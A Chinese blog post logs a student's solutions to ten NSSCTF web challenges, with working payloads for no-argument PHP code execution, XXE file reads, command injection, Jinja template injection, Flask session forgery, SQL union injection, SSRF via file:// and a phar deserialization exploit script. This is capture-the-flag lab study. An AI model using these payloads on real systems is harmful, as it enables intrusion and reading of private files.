NSSCTF web 刷题记录1

已于 2023-09-12 21:04:41 修改
阅读量1.7k 收藏 1
点赞数 1
文章标签: php web安全
于 2023-09-04 12:53:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73512445/article/details/132252385
版权

文章目录

前言

今天是2023.9.3,大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少,新学期新气象。不可急于求成,稳扎稳打,把能利用的时间用来提升web实力。

题目

[GXYCTF 2019]禁止套娃

打开题目,直接扫一下目录
发现是存在git泄露参考文章

在这里插入图片描述然后使用专门的工具Githack(下载地址
打开终端,运行python(运行后要访问,/.git/才能有结果)

在这里插入图片描述源代码

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

分析一下
第一个if语句禁用了一些php伪协议
第二个if语句很明显是无参rce的标志,一般代码为

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}

第三个if语句是禁用我们要rce的一些函数,比如phpinfo()

所以rce的关键是无参

方法一

使用session_start()+session_id()读取文件(php<7)

payload

?exp=show_source(session_id(session_start())); 
Cookie: PHPSESSID=flag.php

得到flag

在这里插入图片描述

方法二

php函数直接读取文件

先读取数组,查看flag在第几个
payload

?exp=print_r(scandir(current(localeconv())));

在这里插入图片描述
发现是第三个,那么我们可以先倒序再读取第二个

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

即可得到flag

[NCTF 2019]Fake XML cookbook

打开题目,根据提示应该不是sql注入
随便输入然后bp抓包,发现是xml格式的登录

在这里插入图片描述联想到XML中存在的XXE漏洞
payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
<user><username>&admin;</username><password>1</password></user>

在这里插入图片描述修改下命令,直接得到flag

在这里插入图片描述

[NSSRound#7 Team]ec_RCE

源代码

 <!-- A EZ RCE IN REALWORLD _ FROM CHINA.TW -->
<!-- By 探姬 -->
<?PHP
    
    if(!isset($_POST["action"]) && !isset($_POST["data"]))
        show_source(__FILE__);

    putenv('LANG=zh_TW.utf8'); 

    $action = $_POST["action"];
    $data = "'".$_POST["data"]."'";

    $output = shell_exec("/var/packages/Java8/target/j2sdk-image/bin/java -jar jar/NCHU.jar $action $data");
    echo $output;    
?>

分析一下,有两个POST参数可控,然后出现shell_exec()函数
它的作用:将字符串作为OS命令执行,需要输出执行结果,且输出全部的内容。
payload

action=||&data='cat /flag'
或者
action=;cat /flag&data=

得到flag

[NCTF 2018]Flask PLUS

打开题目,在url输入{{7*7}}
在这里插入图片描述发现存在ssti漏洞

payload

{{lipsum.__globals__['o''s']['pop''en']('ls /').read()}}

在这里插入图片描述
然后得到flag
在这里插入图片描述

[NSSRound#13 Basic]flask?jwt?

打开题目,想注册admin发现不行(暗示很明显了)
那么我们随便注册一个登陆进去,想拿flag发现不是admin
在这里插入图片描述
猜测这里考点是session伪造
我们在忘记密码的页面找到密钥

在这里插入图片描述然后利用工具flask-session-cookie
先解密

python flask_session_cookie_manager3.py decode -s "th3f1askisfunny" -c ".eJwlzjsOwjAMANC7ZGaI48SOe5nK8UewtnRC3J1KrG96n7LnEeezbO_jikfZX162gmswavTR0k2H0JIq3o0VPZhVeoVkCLyVpyO5VA2WvAXIl3MjcJuVwkiMcZmiVkGqYp4NQyjH8hFIM6F7qC2CCRiu3Gu5I9cZx3_TyvcH8tkwDA.ZPnLwg.GAgeK3Ru7jXj9-2no9xRCYCkhvA"

得到

{'_fresh': True, '_id': '3b573ae452fdca596b909d4c7a3de77a9401f71e309d78d36d90ae79fe3016dbd7261dc806ec69c73bca3a093609cdf23e96f5bd5e368f14deacb61813eda740', '_user_id': '2'}

那么我们想伪造admin的话,猜测_user_id: 1
加密一下

python flask_session_cookie_manager3.py encode -s "th3f1askisfunny" -t "{'_fresh': True, '_id': '3b573ae452fdca596b909d4c7a3de77a9401f71e309d78d36d90ae79fe3016dbd7261dc806ec69c73bca3a093609cdf23e96f5bd5e368f14deacb61813eda740', '_user_id': '1'}"

得到加密后字符串,回到拿flag页面bp抓包
修改session得到flag

在这里插入图片描述

[SCTF 2021]loginme

下载题目附件,发现是go语言
main.go

package main

import (
	"html/template"
	"loginme/middleware"
	"loginme/route"
	"loginme/templates"

	"github.com/gin-gonic/gin"
)

func main() {
	gin.SetMode(gin.ReleaseMode)  //将 Gin 框架的运行模式设置为发布模式
	r := gin.Default()  //使用 Gin 框架时创建一个默认的路由引擎实例的代码
	templ := template.Must(template.New("").ParseFS(templates.Templates, "*.tmpl"))  模板解析
	r.SetHTMLTemplate(templ)

	r.Use(gin.Logger())
	r.Use(gin.Recovery())
	authorized := r.Group("/admin")  //创建一个新的路由名为admin
	authorized.Use(middleware.LocalRequired())  //调用middleware.LocalRequired()方法,其实是waf
	{
		authorized.GET("/index", route.Login)  //定义了一个在 "/admin/index" 路径上的 GET 请求的路由
	}

	r.GET("/", route.Index)
	r.Run(":9999")
}

既然调用了middleware.LocalRequired()
那么我们看一下middleware.go

package middleware

import (
	"github.com/gin-gonic/gin"
)

func LocalRequired() gin.HandlerFunc {
	return func(c *gin.Context) {
		if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != "" {
			c.AbortWithStatus(403)
			return
		}
		ip := c.ClientIP()
		if ip == "127.0.0.1" {
			c.Next()
		} else {
			c.AbortWithStatus(401)
		}
	}
}

简单分析一下,方法禁用了x-forwarded-forx-client-ip
然后检测是否为127.0.0.1,那么我们可以用X-Real-IP绕过

再回到源码,继续看route.Login具体干什么
(这里截取有用部分)

func Login(c *gin.Context) {
	idString, flag := c.GetQuery("id")  //通过调用 c.GetQuery("id") 查询参数并将返回的值赋值给 idString 和 flag
	if !flag {
		idString = "1"
	}
	id, err := strconv.Atoi(idString)
	if err != nil {
		id = 1
	}
	TargetUser := structs.Admin  //一个结构体
	for _, user := range structs.Users {  //循环遍历 structs.Users 切片,在其中查找与给定 id 值匹配的用户,并将找到的用户赋值给 TargetUser 变量
		if user.Id == id {
			TargetUser = user
		}
	}

	age := TargetUser.Age  //age := TargetUser.Age 这行代码将从 TargetUser 中获取 Age 字段的值,并将其赋值给 age 变量。
	if age == "" {
		age, flag = c.GetQuery("age")
		if !flag {
			age = "forever 18 (Tell me the age)"
		}
	}

	if err != nil {
		c.AbortWithError(500, err)
	}

	html := fmt.Sprintf(templates.AdminIndexTemplateHtml, age)  //格式化字符串并赋值给新串html
	if err != nil {
		c.AbortWithError(500, err)
	}

	tmpl, err := template.New("admin_index").Parse(html)  //Parse()方法用来解析、评估模板中需要执行的action,其中需要评估的部分都使用{{}}包围,并将评估后(解析后)的结果赋值给tmpl
	if err != nil {
		c.AbortWithError(500, err)
	}

	tmpl.Execute(c.Writer, TargetUser)
}

从这里就可以看到突破口,首先是TargetUser := structs.Admin会创建结构体,然后从 TargetUser 中获取 Age 字段的值,赋值给html,最后Parse()方法解析。

具体思路就是go语言模板渲染支持传入一个结构体的实例来渲染它的字段,就有可能造成信息泄露,而在go语言中使用的是{{.name}}代表要应用的对象

我们接着看下结构体structs.go,发现思路正确
在这里插入图片描述
payload

?id=0&age={{.Password}}

我们bp抓包,伪造ip和GET上传参数
得到flag
在这里插入图片描述

[网鼎杯 2018]Fakebook

打开题目,先dirsearch扫一下目录
发现有robots.txt
在这里插入图片描述访问一下,发现存在源码泄露
在这里插入图片描述源码

<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

这里发现isValidBlog(),有正则匹配(我说怎么填个1不行)
那么回去注册界面,随便注册一个
成功进入,此时发现有GET传参参数no,试试?no=1',发现存在sql注入漏洞
我们先查询下字段数

?no=1 order by 5 --+

发现测试到5的时候报错
在这里插入图片描述说明字段数为4
然后用联合查询注入,发现union select被禁了
这里尝试union/**/select发现可以绕过
爆库名

?no=-1 union/**/select 1,database(),3,4 --+

在这里插入图片描述爆表名

?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = 'fakebook' --+

在这里插入图片描述爆列名

?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name = 'users' --+

在这里插入图片描述查询数据,结果发现没有flag
并且还有一串以序列化格式存在的字符串,且在后面发现其报错是Trying to get property of non-object(正在尝试获取非对象的属性)就是要让我们传对象,且爆出了路径,所以可能在这里进行了反序列化

在这里插入图片描述回想到扫目录里存在./flag.php
同时 curl存在ssrf,可以使用file://协议读取文件内容

构造exp

<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "file:///var/www/html/flag.php";

}
echo serialize(new UserInfo());

因为我们还是要先查询,所以将序列化后的字符串添加到查询语句里
payload

?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:0:"";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' --+

在这里插入图片描述然后base64解码一下得到flag
在这里插入图片描述

[CSAWQual 2019]Unagi

打开题目,发现有上传文件功能
并且给出xml样例
在这里插入图片描述发现题目已经告诉我们flag位置
在这里插入图片描述

我们可以恶意上传xml文件去读取flag
exp

<?xml version='1.0'?>
<!DOCTYPE users [
	<!ENTITY xxe SYSTEM "file:///flag">
]>
<users>
<user>
<username>alice</username>
<password>passwd1</password>
<name>Alice</name>
<email>alice@fakesite.com</email>
<group>CSAW2019</group>
</user>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>bob@fakesite.com</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
</users>

注意下,要记得引用&xxe,不然不会回显flag
上传后发现有waf
在这里插入图片描述那么我们可以编码绕过
打开kali,输入

iconv -f UTF-8 -t UTF-16BE 1.xml > 2.xml

然后将新得到的文件上传,得到flag
在这里插入图片描述

[MoeCTF 2022]Sqlmap_boy

打开题目,发现是登录框并且不给注册
查看下源码,有sql后台查询语句

$sql = 'select username,password from users where username="'.$username.'" && password="'.$password.'";';

分析一下,闭合方式为双引号闭合
那么我们试试万能语句

admin" or 1#

发现成功进入
在这里插入图片描述然后就是常规注入
先查询一下字段

?id=-1' union select 1,2,3 --+

发现字段数为3
爆库名

?id=-1' union select 1,2,database() --+

爆表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'moectf' --+

爆列名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'flag' --+

查询数据

?id=-1' union select 1,2,group_concat(flAg) from flag --+

得到flag
在这里插入图片描述

[SWPU 2018]SimplePHP

打开题目,发现有查看文件和上传文件的功能
我们读取下file.php
在这里插入图片描述再分别读取下
function.php源码

<?php 
//show_source(__FILE__); 
include "base.php"; 
header("Content-type: text/html;charset=utf-8"); 
error_reporting(0); 
function upload_file_do() { 
    global $_FILES; 
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 
    //mkdir("upload",0777); 
    if(file_exists("upload/" . $filename)) { 
        unlink($filename); 
    } 
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); 
    echo '<script type="text/javascript">alert("上传成功!");</script>'; 
} 
function upload_file() { 
    global $_FILES; 
    if(upload_file_check()) { 
        upload_file_do(); 
    } 
} 
function upload_file_check() { 
    global $_FILES; 
    $allowed_types = array("gif","jpeg","jpg","png"); 
    $temp = explode(".",$_FILES["file"]["name"]); 
    $extension = end($temp); 
    if(empty($extension)) { 
        //echo "<h4>请选择上传的文件:" . "<h4/>"; 
    } 
    else{ 
        if(in_array($extension,$allowed_types)) { 
            return true; 
        } 
        else { 
            echo '<script type="text/javascript">alert("Invalid file!");</script>'; 
            return false; 
        } 
    } 
} 
?>

简单分析一下,就是对上传文件进行检测,白名单为array("gif","jpeg","jpg","png")

class.php源码

 <?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?>

出现反序列化,然后结合题目有文件上传功能,猜测考点是phar反序列化
pop链子

C1e4r.__destruct() --> Show.__toString() --> Test.__get() --> Test.get() --> Test.file_get()

exp

<?php
class C1e4r
{
    public $test;
    public $str;
}

class Show
{
    public $source;
    public $str;
}
class Test
{
    public $file;
    public $params;
}

$a=new C1e4r();
$b=new Show();
$c=new Test();
$a->str=$b;
$b->str['str']=$c;
$c->params['source'] = "/var/www/html/f1ag.php";
echo serialize($a);

$phar = new Phar("hacker.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>

将生成的phar文件修改下后缀为jpg上传
然后访问./upload查看上传后的文件名
在这里插入图片描述然后在查看文件的地方用phar://读取
payload

?file=phar://upload/db82217ea3f3df41dad4352edeee28cd.jpg

在这里插入图片描述解码一下得到flag

在这里插入图片描述

总结

今天是九月十二号,刷题记录1正式完结,总计十道题。感慨还有好多好多页题目等着我刷,坚持就是胜利,毕竟接触ctf后耐心是必须要有的。

_rev1ve
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
nssctf文件test
03-30
1
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来, 后面那个hagem的题目中间有一个栈的结构,也是比较有感觉的虚拟机题目了 另外hgame已经结束:https://hgame.vidar.club/#/user/login?return=Challenge-List cg-ctf: https://cgctf.nuptsast.com/challenges#Re 题目文件:
[SCTF 2021]loginme
最新发布
wikey 的博客
03-31 162
题目的提示是CVE-2020-28483,我提前去查了一下。好像没有执行,这个时候回想到这个题用的是go语言的gin框架,go语言模板渲染支持传入一个结构体的实例来渲染它的字段,就有可能造成信息泄露。意思就是说用了gin框架的会出现漏洞可以用XFF文件头伪造admin。似乎是把我的输入给输出出来了,那我们试试模板注入。我发现直接用.也可,翻了其他博主的wp是这个原因。注意到这个id和名字,我们切换试试。代表要应用的对象,所以可以让。直到最后换到4,观察结果。
[HCTF 2018]admin之Flask之session伪造
weixin_52116519的博客
04-22 2995
接解法一 解法二:Flask之session伪造 原理 首先要明确cookie和session的区别:cookie放在客户端,我们可以获得的。session放在服务器,我们无法拿到的,但是flask这种轻量级的框架,session就放在了客户端,因此我们能拿来修改,这就是我们能session伪造的原因。session加密了,可以用解密脚本来解密。我们将一般用户的session修改为admin的session,再用加密脚本加上秘钥来加密成admin的session就OK了。 过程 参考文章 Flask之ses
NSS [NCTF 2018]滴!晨跑打卡
Jay17的博客
10-24 428
NSS [NCTF 2018]滴!晨跑打卡
解:[NCTF 2018]flask真香--TLS_预备队任务(1)
river_mouth_man的博客
03-09 617
ssti
NSSCTF第12页(1)
wwwwyyyrre的博客
11-14 339
应该是和[HUBUCTF 2022 新生赛]ezsql搞混掉了点击按钮出现了发现输入什么回显什么伪协议也不行看源代码发现了这个玩意输入了1;发现了其他回显ls 发现了两个文件发现被限制了不知道是cat还是空格绕过直接找吧还是 得到flag。
SCTF2021__loginme
Sk1y的博客
03-11 866
SCTF2021__loginme 文章目录SCTF2021__loginme查看请求头模板渲染参考链接 赛后复现 docker创建容器,打开 提示我们需要localhost,但是我们使用XFF不可以,同时题目也给了附件,是go语言的,不是很会,这两天学了一下,来看下这个题目,复现下 题目给的附件: 打开看了main.go,这个源码是缺了一部分的,但是不影响做题(题目附件中缺了templates,赛后出题人将所有的源码放在了github,复现题目没问题) 之前没碰过go,边学边做吧 本题目用了一个gin
Web】CTFSHOW 常用姿势刷题记录(全)
uuzeray的博客
02-25 1682
通过将常用的函数、类和数据打包成.so 文件,不同的程序可以共享这些代码,避免重复编写和维护相同的代码逻辑,提高了代码的重用性。
无参数RCE
sGanYu
10-02 2149
[GXYCTF2019]禁止套娃 <?php include "flag.php";//执行并包含flag.php echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){//以get方式提交exp,非空且为字符串 if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/.
[SWPUCTF 2021 新生赛]traditional
03-15
1. 古典密码:八卦图密码是一种古典密码,它使用阳爻和阴爻来表示二进制数字。 2. 二进制数学:二进制数学是计算机的基础,它可以用来加密和解密信息。 3. 八卦图:八卦图是中国古典哲学中的一个概念,它可以用来...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
NJUPTCTF-2018出题心得
郁离歌丶的博客
01-21 4456
NJUPTCTF-2018出题心得 NJUPTCTF-2018结束也有几个月了,我也是昨天才忙完各种琐事,包括比赛、考试、出题、总结等等。这段时间经历的事情太多,心也逐渐疲惫,同时感到和同龄人的差距越来越大。现在要补这几个月落下的东西,昨天把CTF学习交流群的入群题出了一下,题目比较简单,希望师傅们别喷。这段时间欠的最久的应该就是校赛的出题心得了吧。虽然我的题全部都有人解出,但是还是有很多人要我写...
NSSCTF刷题
m0_63711447的博客
03-19 429
preg_match() 函数:用于进行正则表达式匹配,成功返回 1 ,否则返回 0intval ():获取变量的整数值isset()函数:在php中用来判断变量是否声明,该函数返回布尔类型的值,即true/false。isset只能用于变量,传递任何其它参数都将造成解析错误。is_string():用于检测变量是否是字符串看代码发现有三个if条件需要绕过第一个:用post对a进行传参,参数不能包含0-9的数字且要是整型绕过preg_match()函数可以用数组绕过显示go on,成功绕过。
NSSCTF做题第9页(3)
wwwwyyyrre的博客
10-25 508
代码审计这段代码定义了一个名为ClassName的类,并在脚本的最后创建了一个ClassName类的实例。在ClassName类的构造函数中,首先通过调用$this->x()方法获取了请求参数$_REQUEST中的值,并将其赋值给属性。接下来,使用函数对进行解码,将解码后的结果赋值给属性。最后,使用eval()函数执行中的代码。ClassName类还定义了一个名为x()的公共方法,它返回$_REQUEST数组,即包含了所有请求参数的关联数组。最后,通过创建了一个ClassName。
Bugku-Flask_FileUpload
weixin_58595795的博客
07-27 1850
1、F12打开开发者工具,查看网页源代码,发现一段注释,(意思为给我一份文件,我会通过python运行后将结果返回给你)
NSSCTF web 刷题记录2
rev1ve的博客
09-17 3232
源代码phpif(!|\&|\*|\?else{else{?':?"";if ((!break;break;?"";");?简单分析一下,首先是两个函数,功能分别为正则匹配一些字符;foreach循环检测每个值是否合法。然后就是swtich选择结构。我们思路是可以先看看hint有什么,为了绕过if条件判断,我们可以用%81去绕过,因为%81为不可见字符,escapeshellcmd又可以将不可见字符消除payload。
ctfshow刷题-web3
m0_52011198的博客
02-22 145
php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。include里面的参数是url,提示了可以利用php://伪协议来进行代码执行。猜测ctf_go_go_go中含有flag,利用cat命令进行查看,得到flag。利用burp进行抓包,在包中写入想要执行对的代码,先使用ls命令查看一下文件。
nssctf的jwt问3
08-17
首先将图像的背景填充为白色。 2. 在保存图片时,使用 `ImageIO.write()` 方法将二维码图像保存为 PNG 格式的图片文件。 3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值